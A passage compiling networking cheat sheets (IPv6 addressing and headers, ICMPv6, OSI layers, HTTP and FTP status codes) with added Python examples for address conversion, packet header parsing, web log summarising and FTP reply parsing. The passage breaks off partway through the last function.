Payload Length | Next Header | Hop Limit
Source Address
Destination Address
(followed by Extension Headers, if any)

Version (4 bits) · Always set to 6
Traffic Class (8 bits) · A DSCP value for QoS
Flow Label (20 bits) · Identifies unique flows (optional)
Payload Length (16 bits) · Length of the payload in bytes
Next Header (8 bits) · Header or protocol which follows
Hop Limit (8 bits) · Similar to IPv4's time to live field
Source Address (128 bits) · Source IP address
Destination Address (128 bits) · Destination IP address

Address Types
Unicast · One-to-one communication
Multicast · One-to-many communication
Anycast · An address configured in multiple locations

Address Notation
· Eliminate leading zeros from all two-byte sets
· Replace up to one string of consecutive zeros with a double-colon (::)

Address Formats
Global unicast: Global Prefix (48) | Subnet (16) | Interface ID (64)
Link-local unicast: Prefix (64) | Interface ID (64)
Multicast: FF (8) | Flags (4) | Scope (4) | Group ID (112)
The Interface ID is formed from the MAC address by EUI-64.

EUI-64 Formation
· Insert 0xfffe between the two halves of the MAC
· Flip the seventh bit (universal/local flag) to 1

Special-Use Ranges
::/0           Default route
::/128         Unspecified
::1/128        Loopback
::/96          IPv4-compatible*
::FFFF:0:0/96  IPv4-mapped
2001::/32      Teredo
2001:DB8::/32  Documentation
2002::/16      6to4
FC00::/7       Unique local
FE80::/10      Link-local unicast
FEC0::/10      Site-local unicast*
FF00::/8       Multicast
* Deprecated

Extension Headers
Hop-by-hop Options (0) · Carries additional information which must be examined by every router in the path
Routing (43) · Provides source routing functionality
Fragment (44) · Included when a packet has been fragmented by its source
Encapsulating Security Payload (50) · Provides payload encryption (IPsec)
Authentication Header (51) · Provides packet authentication (IPsec)
Destination Options (60) · Carries additional information which pertains only to the recipient

Transition Mechanisms
Dual Stack · Transporting IPv4 and IPv6 across an infrastructure simultaneously
Tunneling · IPv6 traffic is encapsulated into IPv4 using IPv6-in-IP, UDP (Teredo), or Intra-Site Automatic Tunnel Addressing Protocol (ISATAP)
Translation · Stateless IP/ICMP Translation (SIIT) translates IP header fields, NAT Protocol Translation (NAT-PT) maps between IPv6 and IPv4 addresses

Multicast Scopes
1 Interface-local    5 Site-local
2 Link-local         8 Org-local
4 Admin-local        E Global
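The EUI-64 formation and address-notation rules above, worked through in code. This is an added example, not part of the packetlife sheet: the MAC address is a constructed sample, the function names are my own, and the standard library's ipaddress module is used only to cross-check the hand-written compression. The reverse direction (recovering the MAC from an EUI-64 interface ID) is included because it is what an analyst needs when matching a link-local address seen in logs to a NIC; it returns None for addresses that do not carry the ff:fe marker, as privacy or random interface IDs do not.

```python
import ipaddress
from typing import List, Optional

# Added example (not from the cheat sheet): build a modified EUI-64 interface
# ID from a 48-bit MAC, form the fe80::/64 link-local address, and apply the
# two address-notation rules. Function names and the sample MAC are my own.


def mac_to_eui64(mac: str) -> bytes:
    """Return the 8-byte modified EUI-64 interface ID for a MAC address."""
    octets = bytes.fromhex(mac.replace(":", "").replace("-", ""))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")
    # Rule 1: insert 0xfffe between the two halves of the MAC.
    eui = octets[:3] + b"\xff\xfe" + octets[3:]
    # Rule 2: flip the seventh bit (universal/local flag) of the first octet.
    return bytes([eui[0] ^ 0x02]) + eui[1:]


def eui64_to_mac(addr: str) -> Optional[str]:
    """Recover the MAC embedded in an EUI-64 interface ID, or None if the
    low 64 bits do not carry the ff:fe marker (privacy/random IIDs do not)."""
    iid = ipaddress.IPv6Address(addr).packed[8:]
    if iid[3:5] != b"\xff\xfe":
        return None
    octets = bytes([iid[0] ^ 0x02]) + iid[1:3] + iid[5:]
    return ":".join(f"{b:02x}" for b in octets)


def compress_ipv6(groups: List[int]) -> str:
    """Notation rules: drop leading zeros in each 16-bit group and replace the
    single longest run (two or more) of all-zero groups with '::'."""
    if len(groups) != 8:
        raise ValueError("an IPv6 address has eight 16-bit groups")
    hextets = [f"{g:x}" for g in groups]          # 'x' formatting drops leading zeros
    best_start, best_len = -1, 0
    i = 0
    while i < 8:
        if groups[i] != 0:
            i += 1
            continue
        j = i
        while j < 8 and groups[j] == 0:
            j += 1
        if j - i > best_len:                       # on a tie the first run wins
            best_start, best_len = i, j - i
        i = j
    if best_len < 2:                               # a lone zero group is written as '0'
        return ":".join(hextets)
    left = ":".join(hextets[:best_start])
    right = ":".join(hextets[best_start + best_len:])
    return f"{left}::{right}"


def link_local_from_mac(mac: str) -> str:
    """fe80::/64 prefix followed by the EUI-64 interface ID, compressed."""
    iid = mac_to_eui64(mac)
    groups = [0xFE80, 0, 0, 0] + [int.from_bytes(iid[k:k + 2], "big") for k in (0, 2, 4, 6)]
    text = compress_ipv6(groups)
    # Cross-check the hand-written compression against the standard library.
    assert text == str(ipaddress.IPv6Address(text))
    return text


if __name__ == "__main__":
    sample_mac = "00:1b:21:aa:bb:cc"  # constructed sample MAC
    ll = link_local_from_mac(sample_mac)
    print(sample_mac, "->", ll, "->", eui64_to_mac(ll))
```

The flip in rule 2 is an XOR rather than a set-to-1, so the same function also reverses the transformation; a MAC whose universal/local bit is already 1 (a locally administered address) comes out with that bit cleared, which is the modified EUI-64 behaviour and the reason the bit is described as "flipped" rather than "set".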


Version : IP version number (6).
Traffic class : Used by originating nodes and/or forwarding routers to identify and distinguish between different classes or priorities of IPv6 packets.
Flow label : Used by a source to label sequences of packets for which it requests special handling by the IPv6 routers.
Payload Length : Length of the IPv6 payload (also the extension headers).
Next Header : Identifies the type of header following the IPv6 header.
Hop Limit : Decremented by 1 by each node that forwards the packet.
Source Address : Address of the originator of the packet
Destination Address : Address of the intended recipient of the packet (possibly not the ultimate recipient, if a Routing header is present)

Multicast Flags (000T)
T = 0 Well-known
T = 1 Transient

Multicast Scope
1 Interface-local
2 Link-local
4 Admin-local
5 Site-local
8 Organization-local
E Global

Address Formats
IPv4-compatible IPv6 address: 0 (80 bits) | 0 (16 bits) | IPv4 address (32 bits)
IPv4-mapped IPv6 address: 0 (80 bits) | FFFF (16 bits) | IPv4 address (32 bits)
Subnet-Router Anycast address: Subnet Prefix (n bits) | 0 (128-n)
Link-Local IPv6 Unicast address (FE80::/10): 1111111010 (10 bits) | 0 (54 bits) | Interface ID (64 bits)
Site-Local IPv6 Unicast address (FEC0::/10): 1111111011 (10 bits) | Subnet ID (54) | Interface ID (64)
IPv6 Global Unicast addresses (2000::/3 prefix, IANA delegated): 001 | Global routing prefix (45) | Subnet ID (16) | Interface ID (64)
IPv6 Global Unicast addresses (not starting with binary value 000): Global routing prefix (n) | Subnet ID (64-n) | Interface ID (64)
General format for IPv6 Global Unicast addresses: Global routing prefix (n bits) | Subnet ID (m) | Interface ID (128-n-m)

Well Known Multicast Addresses
Interface-local   FF01:0:0:0:0:0:0:1        All Nodes Addresses
Link-local        FF02:0:0:0:0:0:0:1        All Nodes Addresses
Interface-local   FF01:0:0:0:0:0:0:2        All Routers Addresses
Link-local        FF02:0:0:0:0:0:0:2        All Routers Addresses
Site-local        FF05:0:0:0:0:0:0:2        All Routers Addresses
Link-local        FF02:0:0:0:0:1:FFXX:XXXX  Solicited-Node Address
Link-local        FF02:0:0:0:0:0:0:4        DVMRP Routers
Link-local        FF02:0:0:0:0:0:0:5        OSPFIGP
Link-local        FF02:0:0:0:0:0:0:6        OSPFIGP DRs
Link-local        FF02:0:0:0:0:0:0:9        RIP Routers
Link-local        FF02:0:0:0:0:0:0:D        All PIM Routers
Link-local        FF02:0:0:0:0:0:0:16       All MLDv2 Routers
Link-local        FF02:0:0:0:0:0:1:2        All DHCP Agents
Site-local        FF05:0:0:0:0:0:1:3        All DHCP Servers
Variable Scope    FF0X:0:0:0:0:0:0:101      Network Time Protocol

Ethernet Types
0800 IPv4
0806 ARP
8035 Reverse ARP
86DD IPv6
8847 MPLS Unicast
8848 MPLS Multicast
8863 PPPoE (Discovery stage)
8864 PPPoE (PPP session stage)
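A classifier for the address formats and multicast flag/scope fields listed above, written as an added example (not part of the estoile sheet). It maps an address to the special-use range it falls in, decodes the T flag and scope nibble of a multicast address, and extracts the embedded IPv4 address from IPv4-mapped, IPv4-compatible and 6to4 addresses; the 6to4 layout (the IPv4 address sits in bits 16-48 of a 2002::/16 address) is from RFC 3056 and is not stated on the sheet. Range names and sample addresses are my own; the sample addresses come from documentation space.

```python
import ipaddress
from typing import Optional

# Added example (not from the cheat sheet): classify an IPv6 address against
# the special-use ranges, decode multicast flags/scope, and pull out an
# embedded IPv4 address where the format carries one.

# Most specific prefixes first, so ::/128 and ::1/128 win over ::/96 and the
# IPv4-mapped ::ffff:0:0/96 is checked before the deprecated ::/96.
SPECIAL_USE = [
    ("Unspecified", "::/128"),
    ("Loopback", "::1/128"),
    ("IPv4-mapped", "::ffff:0:0/96"),
    ("IPv4-compatible (deprecated)", "::/96"),
    ("Teredo", "2001::/32"),
    ("Documentation", "2001:db8::/32"),
    ("6to4", "2002::/16"),
    ("Unique local", "fc00::/7"),
    ("Link-local unicast", "fe80::/10"),
    ("Site-local unicast (deprecated)", "fec0::/10"),
    ("Multicast", "ff00::/8"),
    ("Global unicast", "2000::/3"),
]
_NETWORKS = [(name, ipaddress.IPv6Network(cidr)) for name, cidr in SPECIAL_USE]

MCAST_SCOPE = {0x1: "Interface-local", 0x2: "Link-local", 0x4: "Admin-local",
               0x5: "Site-local", 0x8: "Organization-local", 0xE: "Global"}


def address_type(addr: ipaddress.IPv6Address) -> str:
    for name, net in _NETWORKS:
        if addr in net:
            return name
    return "Reserved/other"


def embedded_ipv4(addr: ipaddress.IPv6Address, kind: str) -> Optional[str]:
    raw = addr.packed
    if kind in ("IPv4-mapped", "IPv4-compatible (deprecated)"):
        return str(ipaddress.IPv4Address(raw[12:16]))   # low 32 bits
    if kind == "6to4":
        # RFC 3056: 2002:WWXX:YYZZ::/48 embeds the IPv4 address W.X.Y.Z
        return str(ipaddress.IPv4Address(raw[2:6]))
    return None


def describe(text: str) -> dict:
    """Type, embedded IPv4 (if any) and, for multicast, the flags and scope."""
    addr = ipaddress.IPv6Address(text)
    kind = address_type(addr)
    info = {"address": str(addr), "type": kind, "embedded_ipv4": embedded_ipv4(addr, kind)}
    if kind == "Multicast":
        flags, scope = addr.packed[1] >> 4, addr.packed[1] & 0xF
        info["flags"] = flags
        info["transient"] = bool(flags & 0x1)        # T bit: 0 well-known, 1 transient
        info["scope"] = MCAST_SCOPE.get(scope, f"unassigned ({scope:x})")
    return info


if __name__ == "__main__":
    for sample in ("::ffff:192.0.2.10", "2002:c000:204::1", "ff02::1", "ff3e::8000:1",
                   "fe80::1", "2001:db8::1", "2001::1", "fd12::1", "::"):
        print(describe(sample))
```

Recognising 6to4 and Teredo prefixes in flow records matters because traffic to those ranges is IPv6 tunnelled inside IPv4 and bypasses any policy written only for native IPv6; the embedded IPv4 address is the tunnel endpoint that the IPv4 rules actually see.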

Multicast Address
FF (8 bits) | Flags (4) | Scope (4) | Group ID (112)

IPv6 Cheat Sheet

IPv6 Addressing
Address Type            Binary Prefix        IPv6 Notation
Unspecified             00...0 (128 bits)    ::/128
Loopback                00...1 (128 bits)    ::1/128
Multicast               11111111             FF00::/8
Link-local unicast      1111111010           FE80::/10
Site-local unicast*     1111111011           FEC0::/10
Unique local unicast    1111110000           FC00::/7
Global unicast          (everything else)
IPv4-Compatible IPv6*   0:0:0:0:0:0:A.B.C.D
IPv4-Mapped IPv6        0:0:0:0:0:FFFF:A.B.C.D
6to4                    2002::/16
Anycast                 Unicast address assigned to multiple interfaces.
* Deprecated

ICMPv6 Error Messages (Type/Code)
0-127 Error Messages
1 Destination Unreachable
  0 - no route to destination
  1 - communication with destination administratively prohibited
  2 - (not assigned)
  3 - address unreachable
  4 - port unreachable
2 Packet Too Big
3 Time Exceeded
  0 - hop limit exceeded in transit
  1 - fragment reassembly time exceeded
4 Parameter Problem
  0 - erroneous header field
  1 - unrecognized Next Header type
  2 - unrecognized IPv6 option

ICMPv6 Informational Messages
128-255 Informational Messages
128 Echo Request
129 Echo Reply
130 Multicast Listener Query
131 Multicast Listener Report
132 Multicast Listener Done
133 Router Solicitation
134 Router Advertisement
135 Neighbor Solicitation
136 Neighbor Advertisement
137 Redirect Message
138 Router Renumbering
139 ICMP Node Information Query
140 ICMP Node Information Response
143 Version 2 Multicast Listener Report
144 Home Agent Address Discovery Request
145 Home Agent Address Discovery Reply
146 Mobile Prefix Solicitation
147 Mobile Prefix Advertisement

IPv6 Next Header Fields
041 IPv6
000 IPv6 Hop-by-Hop Option
060 Destination Options for IPv6
043 Routing Header for IPv6
044 Fragment Header for IPv6
051 Authentication Header (AH)
050 Encap Security Payload (ESP)
059 No Next Header for IPv6
002 Internet Group Management (IGMP)
006 Transmission Control (TCP)
017 User Datagram (UDP)
046 Reservation Protocol (RSVP)
047 General Routing Encapsulation (GRE)
055 IP Mobility (MOBILE)
058 ICMP for IPv6 (ICMPv6)
089 OSPFIGP
094 IP-within-IP Encapsulation Protocol (IPIP)
103 Protocol Independent Multicast (PIM)
135 Mobility Header

IPv6 Header
Version (4) | Traffic Class (8) | Flow Label (20)
Payload Length (16) | Next Header (8) | Hop Limit (8)
Source Address (128 bits) [16 bytes]
Destination Address (128 bits) [16 bytes]

IPv6 Extension Headers (NH = Next Header)
IPv6 Header (NH = TCP) -> TCP Header + Data
IPv6 Header (NH = Routing) -> Routing Header (NH = TCP) -> TCP Header + Data
IPv6 Header (NH = Routing) -> Routing Header (NH = Fragment) -> Fragment Header (NH = TCP) -> TCP Header + Data

IPv6 Option Types (8 bits, 3 fields)
act - 2 bits
  00 skip over option
  01 silently discard
  10 discard and send ICMP
  11 discard and send ICMP, if unicast
chg - 1 bit
  0 = option data does not change en-route
  1 = option data may change en-route
rest - 5 bits, the rest of the Option Type

www.estoile.com (03/02/2011)
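The extension-header chaining shown in the three diagrams above, implemented as a Next Header walk. This is an added example, not code from the estoile sheet: it parses the fixed IPv6 header, follows the chain until it reaches an upper-layer protocol, and stops where inspection cannot continue (ESP, No Next Header, or a non-initial fragment whose transport header is in a different packet). The Fragment header is handled as a fixed 8 bytes because its second byte is reserved rather than a length, and the AH length is in 4-octet units, both of which trip up naive parsers. The sample packets and the constants are constructed for the example.

```python
import struct
from typing import List, Optional, Tuple

# Added example (not from the cheat sheet): parse the fixed IPv6 header and
# walk the Next Header chain to find the transport protocol, which is what a
# filter or IDS must do before it can match on TCP/UDP ports. Sample packets
# below are constructed; addresses come from the documentation prefix.

HOP_BY_HOP, ROUTING, FRAGMENT, ESP, AH, NO_NEXT, DEST_OPTS = 0, 43, 44, 50, 51, 59, 60
TCP, UDP, ICMPV6 = 6, 17, 58


def parse_ipv6_header(pkt: bytes) -> dict:
    """Decode the 40-byte fixed header into its fields."""
    if len(pkt) < 40:
        raise ValueError("truncated IPv6 header")
    first, payload_len, next_header, hop_limit = struct.unpack("!IHBB", pkt[:8])
    version = first >> 28
    if version != 6:
        raise ValueError(f"not IPv6 (version {version})")
    return {
        "version": version,
        "traffic_class": (first >> 20) & 0xFF,
        "flow_label": first & 0xFFFFF,
        "payload_length": payload_len,
        "next_header": next_header,
        "hop_limit": hop_limit,
        "src": pkt[8:24],
        "dst": pkt[24:40],
    }


def walk_extension_headers(pkt: bytes) -> Tuple[List[int], Optional[int], int]:
    """Return (extension headers seen, upper-layer protocol, offset of that
    upper-layer header). The protocol is None when nothing beyond the chain
    can be inspected: ESP (encrypted), No Next Header, or a non-initial
    fragment, whose transport header travels in another packet."""
    hdr = parse_ipv6_header(pkt)
    end = min(len(pkt), 40 + hdr["payload_length"])
    nh, off, chain = hdr["next_header"], 40, []
    while True:
        if nh in (HOP_BY_HOP, ROUTING, DEST_OPTS, AH, FRAGMENT):
            if off + 8 > end:
                raise ValueError("truncated extension header")
            ext_nh = pkt[off]                               # every extension header starts with Next Header
            if nh == FRAGMENT:
                size = 8                                    # fixed size; byte 1 is reserved, not a length
                frag_offset = struct.unpack("!H", pkt[off + 2:off + 4])[0] >> 3
                if frag_offset != 0:                        # later fragment: no transport header here
                    chain.append(nh)
                    return chain, None, off + 8
            elif nh == AH:
                size = (pkt[off + 1] + 2) * 4               # AH Payload Len is in 4-octet units, minus 2
            else:
                size = (pkt[off + 1] + 1) * 8               # Hdr Ext Len in 8-octet units, excluding the first 8
            if off + size > end:
                raise ValueError("extension header runs past end of packet")
            chain.append(nh)
            nh, off = ext_nh, off + size
        elif nh in (ESP, NO_NEXT):
            chain.append(nh)
            return chain, None, off
        else:
            return chain, nh, off                           # TCP, UDP, ICMPv6, ...


def transport_ports(pkt: bytes) -> Optional[Tuple[int, int]]:
    """Source and destination port, if a TCP or UDP header is reachable."""
    _, proto, off = walk_extension_headers(pkt)
    if proto in (TCP, UDP) and off + 4 <= len(pkt):
        return struct.unpack("!HH", pkt[off:off + 4])
    return None


# --- constructed sample packets -------------------------------------------
def build_ipv6(next_header: int, payload: bytes) -> bytes:
    src = bytes.fromhex("20010db8000000000000000000000001")
    dst = bytes.fromhex("20010db8000000000000000000000002")
    return struct.pack("!IHBB", 6 << 28, len(payload), next_header, 64) + src + dst + payload


TCP_SYN = struct.pack("!HHIIBBHHH", 51000, 443, 1, 0, 5 << 4, 0x02, 65535, 0, 0)  # 20-byte TCP header
ROUTING_THEN_TCP = bytes([TCP, 0, 0, 0, 0, 0, 0, 0])                               # NH=6, Hdr Ext Len=0
ROUTING_THEN_FRAG = bytes([FRAGMENT, 0, 0, 0, 0, 0, 0, 0])
FIRST_FRAG_THEN_TCP = bytes([TCP, 0]) + struct.pack("!HI", 0, 0x1234)             # offset 0, identification
LATER_FRAG = bytes([TCP, 0]) + struct.pack("!HI", 8 << 3, 0x1234)                  # offset 8: no TCP header here

PKT_PLAIN = build_ipv6(TCP, TCP_SYN)
PKT_ROUTING = build_ipv6(ROUTING, ROUTING_THEN_TCP + TCP_SYN)
PKT_ROUTING_FRAG = build_ipv6(ROUTING, ROUTING_THEN_FRAG + FIRST_FRAG_THEN_TCP + TCP_SYN)
PKT_LATER_FRAG = build_ipv6(FRAGMENT, LATER_FRAG + b"\x00" * 16)
PKT_ESP = build_ipv6(ESP, b"\x00" * 16)

if __name__ == "__main__":
    for name, pkt in (("plain", PKT_PLAIN), ("routing", PKT_ROUTING),
                      ("routing+fragment", PKT_ROUTING_FRAG), ("later fragment", PKT_LATER_FRAG),
                      ("esp", PKT_ESP)):
        print(name, walk_extension_headers(pkt), transport_ports(pkt))
```

The loop is bounded because every extension header advances the offset by at least 8 bytes and the walk stops at the end of the stated payload length; a parser that trusts Hdr Ext Len without the bounds check at each step can be made to read past the buffer by a malformed packet.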


OSI Model / TCP/IP Model (Layer, OSI protocols, TCP/IP protocols, Responsibilities, Data unit, Scope, TCP/IP layer)

7 Application
  OSI protocols: FTAM, X.400, X.500, DAP, ROSE, RTSE, ACSE
  TCP/IP protocols: NNTP, SIP, SSI, DNS, FTP, Gopher, HTTP, NFS, NTP, DHCP, SMPP, SMTP, SNMP, Telnet, RIP, BGP, BOOTP, TFTP, POP3, IMAP
  Responsibilities: User Applications Services
  Data unit: User Data / Application Data
  TCP/IP layer: Application

6 Presentation
  OSI protocols: ISO/IEC 8823, X.226, ISO/IEC 9576-1, X.236
  TCP/IP protocols: MIME, SSL, TLS, XDR, Shells and Redirectors
  TCP/IP layer: Application

5 Session
  OSI protocols: ISO/IEC 8327, X.225, ISO/IEC 9548-1, X.235
  TCP/IP protocols: Sockets. Session establishment in TCP, SIP, RTP, NetBIOS, RPC, Named Pipes
  Responsibilities: Session Establishment, Management and Termination
  Data unit: Sessions
  Scope: Sessions between local or remote devices
  TCP/IP layer: Application

4 Transport
  OSI protocols: ISO/IEC 8073, TP0, TP1, TP2, TP3, TP4 (X.224), ISO/IEC 8602, X.234
  TCP/IP protocols: TCP, UDP, SCTP
  Responsibilities: Process-Level Addressing; Multiplexing/Demultiplexing; Connections; Segmentation and Reassembly; Acknowledgments and Retransmissions; Flow Control
  Data unit: Datagrams/Segments
  TCP/IP layer: Transport (TCP)

3 Network
  OSI protocols: ISO/IEC 8208, X.25 (PLP), ISO/IEC 8878, X.223, ISO/IEC 8473-1, CLNP X.233
  TCP/IP protocols: IP, IPsec, ICMP, IGMP, OSPF, IPv6; IP NAT; IPsec; Mobile IP; ICMP; IPX; DLC; PLP; Routing protocols such as RIP and BGP
  TCP/IP layer: Internet (IP)

2 Data Link
  OSI protocols: ISO/IEC 7666, X.25 (LAPB), Token Bus, X.222, ISO/IEC 8802-2 LLC Type 1 and 2
  TCP/IP protocols: PPP, SLIP, PPTP, L2TP
  Scope: Low-level data messages between local devices
  TCP/IP layer: Network

1 Physical
  OSI protocols: X.25 (X.21bis, EIA/TIA-232, EIA/TIA-449, EIA-530, G.703)
  Responsibilities: Encoding and Signaling; Physical Data Transmission; Hardware Specifications; Topology and Design
  Data unit: Bits
  Scope: Electrical or light signals sent between local devices
  TCP/IP layer: Network


HTTP/1.1 Status Codes

Code  Name                              Notes

100   Continue
101   Switching Protocols

Successful
200   OK                                Everything is normal
201   Created
202   Accepted
203   Non-Authoritative Information
204   No Content
205   Reset Content
206   Partial Content

Redirection
300   Multiple Choices
301   Moved Permanently                 Update your URL, this has moved for good.
302   Found
303   See Other
304   Not Modified
305   Use Proxy
306   Unused
307   Temporary Redirect                This is temporarily moved, don't update your bookmarks.

Client Error
400   Bad Request                       Server didn't understand the URL you gave it.
401   Unauthorized                      Must be authenticated
402   Payment Required                  Not used really
403   Forbidden                         Server refuses to give you a file, authentication won't help
404   Not Found                         A file doesn't exist at that address
405   Method Not Allowed
406   Not Acceptable
407   Proxy Authentication Required
408   Request Timeout                   Browser took too long to request something
409   Conflict
410   Gone
411   Length Required
412   Precondition Failed
413   Request Entity Too Large
415   Unsupported Media Type
416   Request Range Not Satisfiable
417   Expectation Failed

Server Error
500   Internal Server Error             Something on the server didn't work right.
501   Not Implemented
502   Bad Gateway
503   Service Unavailable               Too busy to respond to a client
504   Gateway Timeout
505   HTTP Version Not Supported

Creative Commons Attribution-Share Alike 3.0 Unported – Bryan English - http://bluelinecity.com
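The status-code classes above, applied to web server logs. This is an added example (not part of the status-code sheet): it parses Common Log Format lines, counts responses per class, and flags clients whose requests are mostly client errors, which is what a run of guessed paths or credentials looks like from the server side. The log lines, the regular expression and the thresholds are my own constructions.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List, Optional

# Added example (not part of the cheat sheet): parse Common Log Format lines,
# bucket each status into the classes the table uses, and flag clients whose
# requests are mostly client errors. SAMPLE_LOG is constructed.

CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)'
)

STATUS_CLASS = {1: "Informational", 2: "Successful", 3: "Redirection",
                4: "Client Error", 5: "Server Error"}

SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326
198.51.100.7 - - [10/Oct/2023:13:55:37 +0000] "GET /old-page HTTP/1.1" 301 0
203.0.113.9 - - [10/Oct/2023:13:56:01 +0000] "GET /admin HTTP/1.1" 401 0
203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /missing-1 HTTP/1.1" 404 0
203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /missing-2 HTTP/1.1" 404 0
203.0.113.9 - - [10/Oct/2023:13:56:03 +0000] "GET /private HTTP/1.1" 403 0
198.51.100.7 - - [10/Oct/2023:13:57:10 +0000] "POST /api/order HTTP/1.1" 503 0
this line is not in Common Log Format
"""


def parse_line(line: str) -> Optional[dict]:
    """One CLF line as a dict, or None when the line does not match."""
    m = CLF.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def status_class(code: int) -> str:
    return STATUS_CLASS.get(code // 100, "Unknown")


def summarize(log_text: str) -> dict:
    """Counts per status class overall and per client, plus unparsed lines."""
    by_class: Counter = Counter()
    by_client: Dict[str, Counter] = defaultdict(Counter)
    unparsed = 0
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        if rec is None:
            unparsed += 1          # count rather than drop: a spike here is itself a signal
            continue
        cls = status_class(rec["status"])
        by_class[cls] += 1
        by_client[rec["ip"]][cls] += 1
    return {"by_class": by_class, "by_client": dict(by_client), "unparsed": unparsed}


def noisy_clients(summary: dict, min_requests: int = 3, error_ratio: float = 0.75) -> List[str]:
    """Clients with at least min_requests whose share of 4xx responses reaches
    error_ratio: the footprint a path or credential guessing run leaves."""
    flagged = []
    for ip, counts in summary["by_client"].items():
        total = sum(counts.values())
        if total >= min_requests and counts["Client Error"] / total >= error_ratio:
            flagged.append(ip)
    return sorted(flagged)


if __name__ == "__main__":
    s = summarize(SAMPLE_LOG)
    print(dict(s["by_class"]), "unparsed:", s["unparsed"])
    print("noisy clients:", noisy_clients(s))
```

The 401/403 split matters when tuning this: a 401 burst against one path is a credential-guessing signal, while 404s spread across many paths point at content discovery, and 5xx responses are a server-health signal rather than a client one, so they are counted but never contribute to the flag.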


FTP

Code  Explanation

100 Series  The requested action is being initiated, expect another reply before proceeding with a new command.
110  Restart marker reply. In this case, the text is exact and not left to the particular implementation; it must read: MARK yyyy = mmmm where yyyy is User-process data stream marker, and mmmm server's equivalent marker (note the spaces between markers and "=").
120  Service ready in nnn minutes.
125  Data connection already open; transfer starting.
150  File status okay; about to open data connection.

200 Series  The requested action has been successfully completed.
202  Command not implemented, superfluous at this site.
211  System status, or system help reply.
212  Directory status.
213  File status.
214  Help message. On how to use the server or the meaning of a particular non-standard command. This reply is useful only to the human user.
215  NAME system type. Where NAME is an official system name from the registry kept by IANA.
220  Service ready for new user.
221  Service closing control connection.
225  Data connection open; no transfer in progress.
226  Closing data connection. Requested file action successful (for example, file transfer or file abort).
227  Entering Passive Mode (h1,h2,h3,h4,p1,p2).
228  Entering Long Passive Mode (long address, port).
229  Entering Extended Passive Mode (|||port|).
230  User logged in, proceed. Logged out if appropriate.
231  User logged out; service terminated.
232  Logout command noted, will complete when transfer done.
234  Specifies that the server accepts the authentication mechanism specified by the client, and the exchange of security data is complete. A higher level nonstandard code created by Microsoft.
250  Requested file action okay, completed.
257  "PATHNAME" created.

300 Series  The command has been accepted, but the requested action is on hold, pending receipt of further information.
331  User name okay, need password.
332  Need account for login.
350  Requested file action pending further information.

400 Series  The command was not accepted and the requested action did not take place, but the error condition is temporary and the action may be requested again.
421  Service not available, closing control connection. This may be a reply to any command if the service knows it must shut down.
425  Can't open data connection.
426  Connection closed; transfer aborted.
430  Invalid username or password.
434  Requested host unavailable.
450  Requested file action not taken.
451  Requested action aborted. Local error in processing.
452  Requested action not taken. Insufficient storage space in system. File unavailable (e.g., file busy).

500 Series  Syntax error, command unrecognized and the requested action did not take place. This may include errors such as command line too long.
501  Syntax error in parameters or arguments.
502  Command not implemented.
503  Bad sequence of commands.
504  Command not implemented for that parameter.
530  Not logged in.
532  Need account for storing files.
550  Requested action not taken. File unavailable (e.g., file not found, no access).
551  Requested action aborted. Page type unknown.
552  Requested file action aborted. Exceeded storage allocation (for current directory or dataset).
553  Requested action not taken. File name not allowed.

600 Series  Replies regarding confidentiality and integrity.
631  Integrity protected reply.
632  Confidentiality and integrity protected reply.
633  Confidentiality protected reply.

10000 Series  Common Winsock Error Codes
10054  Connection reset by peer. The connection was forcibly closed by the remote host.
10060  Cannot connect to remote server.
10061  Cannot connect to remote server. The connection is actively refused by the server.
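A parser for the reply format the table describes, added here as an example (not part of the sheet): it groups control-channel lines into replies, including the RFC 959 multi-line form where "220-text" opens a reply that ends at the next line starting with "220 ", classifies each reply by its first digit, and decodes the data-connection endpoint announced by 227 (h1,h2,h3,h4,p1,p2; port = p1*256 + p2) and 229 (|||port|). That decode is exactly what a stateful firewall or IDS must do to permit only the announced passive data connection. The transcript, function names and regular expressions are my own constructions.

```python
import re
from typing import List, Optional, Tuple

# Added example (not part of the cheat sheet): parse FTP control-channel
# replies, including multi-line replies, classify each by first digit, and
# decode the endpoint announced by 227 (PASV) and 229 (EPSV).
# SAMPLE_TRANSCRIPT is constructed.

REPLY_CLASS = {
    "1": "positive preliminary",
    "2": "positive completion",
    "3": "positive intermediate",
    "4": "transient negative",
    "5": "permanent negative",
    "6": "protected reply",
}

FIRST_LINE = re.compile(r"^(\d{3})([ -])(.*)$")
PASV_RE = re.compile(r"\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)")
EPSV_RE = re.compile(r"\(\|\|\|(\d{1,5})\|\)")

SAMPLE_TRANSCRIPT = (
    "220-Welcome to the constructed sample server\r\n"
    "220 Service ready for new user.\r\n"
    "331 User name okay, need password.\r\n"
    "530 Not logged in.\r\n"
    "227 Entering Passive Mode (192,0,2,5,19,137).\r\n"
    "229 Entering Extended Passive Mode (|||5002|)\r\n"
)


def split_replies(raw: str) -> List[Tuple[int, List[str]]]:
    """Group lines into replies. 'xyz-text' opens a multi-line reply that ends
    at the next line beginning with 'xyz ' (same code followed by a space)."""
    replies: List[Tuple[int, List[str]]] = []
    code: Optional[int] = None
    current: Optional[List[str]] = None
    for line in raw.splitlines():
        if current is None:
            m = FIRST_LINE.match(line)
            if not m:
                raise ValueError(f"malformed reply line: {line!r}")
            code = int(m.group(1))
            if m.group(2) == "-":
                current = [m.group(3)]
            else:
                replies.append((code, [m.group(3)]))
        elif line.startswith(f"{code:03d} "):
            current.append(line[4:])
            replies.append((code, current))
            current = None
        else:
            current.append(line)          # continuation lines may take any form
    if current is not None:
        raise ValueError("unterminated multi-line reply")
    return replies


def passive_endpoint(code: int, text: str) -> Optional[Tuple[Optional[str], int]]:
    """(host, port) from a 227 reply; (None, port) from a 229 reply, since EPSV
    reuses the control connection's address; None otherwise or if malformed."""
    if code == 227:
        m = PASV_RE.search(text)
        if not m:
            return None
        h = [int(x) for x in m.groups()]
        if any(x > 255 for x in h):
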